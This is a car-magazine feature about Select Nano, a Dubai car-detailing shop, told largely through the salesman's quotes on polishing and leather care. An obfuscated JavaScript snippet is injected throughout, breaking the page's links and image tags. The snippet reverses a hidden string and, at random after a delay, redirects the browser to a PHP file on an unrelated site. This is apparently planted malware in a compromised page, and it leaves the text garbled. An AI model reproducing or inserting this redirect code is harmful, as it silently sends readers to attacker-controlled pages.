Select Nano. Dubai, UAE. All In The Details

Anybody who has met Frederik Faidhi will know that he likes to talk. And I know he won’t mind me saying this.

Take, for example, my phone conversation with the man recently. Normally an introductory phone call for a crankandpiston $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/tags/garage_visit/” target=”_blank”>Garage Visit runs along these lines: “Hello, my name is James…it’s very nice to speak to you too…what time would be convenient for you?…excellent, we’ll see you then”, CLICK.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/Select-Auto-6.jpg” width=”728″ height=”485″ />

Compare this with the conversation I had with Frederik – Business Development operative at Select Nano – for a crankandpiston Dubai $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/tags/garage_visit/” target=”_blank”>Garage Visit: “Hello, my name is James… very nice to speak to you too…what time would be convenient for you?…from Manchester originally…oh, only eight months now…enjoying it immensely, thank you…oh really, whereabouts?…yes, I used to live there…and how long were you in Germany after that?”, and so on for fifteen minutes or so.

“I’m a salesman. I just talk all the time,” explains Frederik. “I can’t help it ! I speak Arabic, English, I’m fluent in German, and I speak regularly with our Italian suppliers, about anything. If it’s about cars, let’s talk. If it’s about motorcycles, let’s talk.”

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/Select-Auto-11.jpg” width=”728″ height=”485″ />

Indeed, having made my way to Select Nano in Dubai’s Al Quoz region with resident crankandpiston lensman James, Frederik is still in fine fettle, offering a warm handshake, a cheery smile before launching into conversation about the Ducati superbike we are standing next to and the virtues of proper Italian coffee. There’s further deviations through cinema, sports and home cooking – all of which I’m completely swept up by – before we start in on the main business, namely Select Nano and its focus.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/Select-Auto-20.jpg” width=”728″ height=”1092″ />

“It’s quite simple really. We were bought as a franchise in 2008, and the way we prepare a car is completely different to anything else on the market. We do it using nano technology, which exists in Germany, and they’ve invested a lot of time in researching its potential. It can be used for buildings, aeroplanes, ships, boats, anything really. But it’s on cars where we get the best results.

“We turn oranges into apples. If you look at the surface of an orange, it has grooves in it. And that’s also true if you look at the surface of any car, new or old. We can eliminate those by turning the car into an apple: when people eat an apple, first they rub it on their shirt to get the shine. And that’s what we do.”

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/Select-Auto-13.jpg” width=”728″ height=”485″ />

You’ve probably guessed by now that this is no ordinary car cleaning operation: indeed, there’s not a plastic bucket or a chamois leather to be seen inside. There are only four work bays, each of which – like the rest of workshop – is spotless, and each boasts its own lighting rig, air conditioning unit and is decked out in the team’s orange branding. This may seem over the top, until we learn just what is involved in a Select Nano ‘clean’.

“It’s really an art, he way we polish a car. Each one is washed using de-ionized water, which is like very hungry water: as soon as it touches a surface with impurities, it’s like ‘eeee, food!’, and starts to eat it away. Essentially we decontaminate the vehicles and their paint.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/Select-Auto-18.jpg” width=”728″ height=”485″ />

“After every wash, we coat a layer of Isopropyl – which is basically liquid alcohol – over the surface, and this reveals all the mistakes that we make during the polishing, like the streaks. Literally there’s a stage of alcohol in between each process…for the car I should say! Then we use a product called Hologram Free Polishing. A hologram is damage to the paintwork caused by the use of unsuitable paint cleaners or polish sponges, This product eliminates these from the vehicle, and gives the car an exceptional shine.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/Select-Auto-17.jpg” width=”728″ height=”485″ />

“Inspections are done, then the protection is added in two layers: one has to stay on overnight, so we can’t touch the vehicle; the other has to stay on for between a week and ten days before you can wash the vehicle again. I mean, each job takes between three and five days, and others can take a heck of a lot longer! But we really are doing something very interesting here.”

The Select Nano crew is small – there are only three of them at present, including Frederik – and, given the attention to detail involved, each can be working up to 15 hours each day. But these guys are the self-proclaimed ‘Doctors of Detailing’, and we’ve barely scraped the surface.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/Select-Auto-8.jpg” width=”728″ height=”485″ />

“If I want to clean the leather seat of a car, it takes me three days. That’s because I respect the material. First we remove any layers of grime that are on there, and this means the leather is allowed breathe, so we leave it to do so overnight.

“The next day we apply a substance that softens the leather. It’s like taking your wife to the spa, and the professionals there apply lotions and ointments to the skin. We do the same with the leather, and again it’s left overnight.

“The third day involves applying the protection, so as not to discolour the material. I don’t use chemicals derived from the chemical industry. They come from vegetables, so we’re very environmentally friendly. But this also makes it very interesting for the person who is working on the car. Nothing smells bad, so he’s not inhaling poor odours, and therefore not caring about his work. The products themselves are really superb, but are very expensive.”
